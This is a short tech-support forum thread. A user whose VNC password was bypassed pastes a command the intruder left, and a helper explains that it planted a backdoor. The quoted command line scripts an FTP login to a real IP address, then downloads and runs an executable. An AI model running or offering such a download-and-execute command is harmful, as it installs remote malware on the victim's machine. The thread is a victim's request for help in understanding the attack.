# VNC hack- ?code



## Andy128 (Nov 6, 2004)

Greetings-
My VNC was hacked- password bypassed. This run prompt was left by the hacker;


> cmd.exe /c del i&echo open 68.43.255.166 16706 > i&echo user 1 1 >> i &echo get e_48.exe >> i &echo quit >> i &ftp -n -s:i &e_48.exe&del i&exit


Can anyone tell me what it is and what it does? Will just deleting it work?

Thanks-

Andy


----------



## johnwill (Sep 26, 2002)

Obviously, this was to leave a backdoor. I'd delete the command file, and also the e_48.exe program, which clearly doesn't belong there.


----------



## Andy128 (Nov 6, 2004)

With VNC Deleted- is there any possibility that the above code will enable the hacker to gain access/entrance to the computer?

Andy


----------



## johnwill (Sep 26, 2002)

Sure, if they've compromised the system, they don't need VNC anymore.


----------

